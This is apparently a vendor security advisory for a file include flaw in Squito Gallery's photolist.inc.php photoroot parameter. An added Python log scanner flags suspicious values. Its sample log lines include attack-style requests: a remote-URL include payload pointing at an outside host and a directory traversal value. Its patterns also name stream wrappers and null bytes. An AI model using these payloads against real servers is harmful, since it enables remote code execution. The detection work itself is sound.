
Squito.Gallery.Photolist.inc.php.File.Include

Release Date

Aug 05, 2005

Severity

low

Impact

Compromise of the affected system.

Description

This indicates a possible exploit of a file include vulnerability in Squito Gallery.

Squito Gallery is an open source gallery management application written in PHP that uses MySQL as its backend database. A vulnerability has been reported in it that may allow an attacker to execute arbitrary PHP code on the vulnerable server. The flaw exists because the photolist.inc.php script fails to sanitize the value passed to the photoroot parameter in a request. To exploit this, an attacker may convince a victim to click a malicious URL that causes the script to include and execute arbitrary files from external or local resources. Successful exploitation requires that "register_globals" be enabled.

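The description above names the request parameter (photoroot) that reaches an include statement when register_globals is on. The following is an added detection example, not part of this advisory and not Squito Gallery's own code: it scans constructed Apache combined-format access-log lines and flags any request whose photoroot value is an absolute path, a URL or PHP stream wrapper, a traversal sequence, or carries a null byte. The log lines, addresses and file names are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" access-log prefix: client, ident, user, [time], "METHOD target PROTO", status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# A value starting with a scheme (http://, ftp://, php://, data:) would make
# PHP's include() fetch remote content or go through a stream wrapper.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*:', re.IGNORECASE)
# Absolute paths on POSIX or Windows.
ABSOLUTE_RE = re.compile(r'^(/|[A-Za-z]:[\\/])')

PARAM = "photoroot"  # the parameter named in the advisory


def classify_photoroot(value: str):
    """Return a reason string if the value would escape the gallery's own
    directory, or None if it looks like a plain relative directory name."""
    decoded = unquote(value)  # parse_qs decoded once; catch double-encoding too
    if "\x00" in decoded:
        return "null-byte"
    if ABSOLUTE_RE.match(decoded):
        return "absolute-path"
    if SCHEME_RE.match(decoded):
        return "remote-or-wrapper"
    if ".." in decoded.replace("\\", "/").split("/"):
        return "traversal"
    return None


def scan_log(lines):
    """Return one finding per request whose photoroot value is suspicious.
    The parameter is checked on every path, not only photolist.inc.php: that
    file is an include, so with register_globals on the parameter reaches it
    through whichever script includes it."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        query = urlsplit(m.group("target")).query
        for value in parse_qs(query, keep_blank_values=True).get(PARAM, []):
            reason = classify_photoroot(value)
            if reason:
                findings.append({
                    "client": m.group("client"),
                    "time": m.group("time"),
                    "target": m.group("target"),
                    "value": value,
                    "reason": reason,
                })
    return findings


# Constructed sample log lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Aug/2005:10:00:01 +0000] "GET /gallery/index.php?photoroot=photos HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [05/Aug/2005:10:00:02 +0000] "GET /gallery/index.php?photoroot=http%3A%2F%2F198.51.100.7%2Fx HTTP/1.1" 200 512 "-" "curl/7.13"',
    '203.0.113.5 - - [05/Aug/2005:10:00:03 +0000] "GET /gallery/photolist.inc.php?photoroot=..%2F..%2Fconf HTTP/1.1" 500 300 "-" "curl/7.13"',
    '192.0.2.11 - - [05/Aug/2005:10:00:04 +0000] "GET /gallery/index.php?album=summer HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['reason']}: {f['target']}")
```

Access logs only record the query string, so a value sent in a POST body is invisible to this check; an IPS or web application firewall inspecting request bodies covers that gap. On the server side the durable fix is the one the advisory points to (patch or upgrade), with register_globals disabled so request parameters cannot populate script variables in the first place.
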
Affected Products

Squito Gallery 1.3.3 and Squito Gallery 1.3.2.

Recommended Actions

Apply the appropriate patch from the vendor if available, or upgrade to a non-vulnerable version.

Coverage

IPS
VCM

Common Vulnerabilities and Exposures (CVE)

CVE-2005-2258

Reference/s

http://www.securityfocus.com/bid/14219 (BugTraq)

Reference: VID-10390